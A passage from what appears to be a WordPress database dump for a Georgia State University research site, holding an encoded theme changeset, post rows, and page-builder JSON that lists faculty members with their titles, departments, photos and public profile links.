fiIxUcsPmLxEYuPWHzE4iMWH7H4iMVHLD5i8TEOf0pxeEb3G4dn9HTi8IxiHB7j8Iy9MQ7PGMbhMQ5-nHF4TuCa0Wfi8B+z9LsNbuLpYuqJ7kAxELAj-D7aMQjP2PsJwjOGQfgxJTDsMQjPTj9TamAQnsF5B+E-Zul3S4DexNPF9JwC8IyPHoBnp5S8gjR3iMEfvGbEq6LsTBCMsmOU-ZVR9iqxZTx1kfZFVlcErm2WEbgm-PpLUsfTq6ROylmap1WdxpfZoqqTsvpHnj0RflWXi4SAtLM54R+mSVl8zOu0fvp78kT41aLMCUT8IksJRPziSzW5nZfFlzRLCET84uKyuLi4-Nek5l8-LCwvNP8weaqTS3FTfdXVNL+8ePjPf-4T+9d-TZ4ei3JSEX6VuF01AlrF08XUFynK9D7NCb-6-Mvlz7f--OPj5-+9-f1-f-t48fPHi6vbn3+5+f0fn--Xl26XDOFX1F903fHLhPCrRMlI8QiCKLE8EBFlwZ3RIpgAiwQoxe5i0T2XTgi-+ve--9ZdmSdZdlmUZRLXaZF-zO1dlkzaTmtl+WgeXIRBIAwCYRAIg0AYBMIgEAaBMAiEQSAMAmEQCINAGMTRwyD2TEfAToiOgCEdAcIggL2VjoAhHQHCIE73rL8ir4rcExHwSGmjwnm+CwRC7QqBeEc8BAx5CEaVvvvkIWBnx0PA1Lkf9VfkVZEToL9PbTlPzgoFMT4NAUMagh+Dgjgj3MHrsvsZZvcj7uCtx+s5Vbee2nKeBOZORcKyO4v5-RjYxsA2BrYxsI2BbQxsY2AbA9sY2MbANga2MbB9SoFtkPsNbIM8ncA2SAxsY2Ab1BsD23D64RMMbJ9bYPsiv0+y9K9F0oa0FZUAkdgtqz-aNaQN6v2EtEFhSHtMuav3GNIGTc4spO2780xD2l6gEaD-TrMsPatz9cCMHtSGUwol4rl6mNO-82Lh9FWxdU4xto6x9TfF1q3Xuh-dFoUxdYypY0wdY+oYU8eYOsbUMaaOMXWMqWNMHWPqGFM-oZg6V-uNqXN1OjF1rjCmjjF1rt8YU+enH7-BmPo75synZkNMvcxvXbfP0-hrUt5m6d1tnczmt1-sFzDJlyiQwk4CkdAouIuNDIAJEYtJpJShPg4vQTFJd4vDS75jHJ7r9xOH5xrj8GPKarPHODw35Mzi8L47zzQO-2tRTReWAP3nIi2L7+cUhBd09CC8OKWYI2aWn8QsZa+KfotTP8UKo9+Hjn7-WVTThQ3+WqRl8T3gLFKMA4swCI5BcAyCYxAcg+AYBMcgOAbBMQiOQXAMgmMQHIPgz5d+udxzJTbfW73a-w1A4JIApBMCQPgF082FzOb37hIBmCRf7CKrfenJU25naezuf7FZlbjr9dM88Q-5SAsQdfX-AQ3zHtiv4QcA\"\n            }\n        },\n        \"type\": \"theme_mod\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2024-11-07 19:20:44\"\n    }\n}','','','trash','closed','closed','','825e4112-0a94-42ad-a771-2ac6a4f3a312','','','2024-11-07 14:20:44','2024-11-07 19:20:44','',0,'https://gsudice.dataconn.net/?p=1859',0,'customize_changeset','',0),(1860,1,'2024-11-07 14:20:06','2024-11-07 19:20:06','','Siv photo','','inherit','open','closed','','siv-photo','','','2024-11-07 14:20:06','2024-11-07 19:20:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2024/11/Siv-photo.jpg',0,'attachment','image/jpeg',0),(1861,1,'2024-11-07 14:20:44','2024-11-07 19:20:44','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c64\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Faris-e1697216253732.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1814,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Faris Hawamdeh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":2,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Academic Professional<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/faris-hawamdeh\\/?trk=public_profile_publication_contributor-image\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/faris-hawamdeh\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Faris-Hawamdeh\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c69\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos 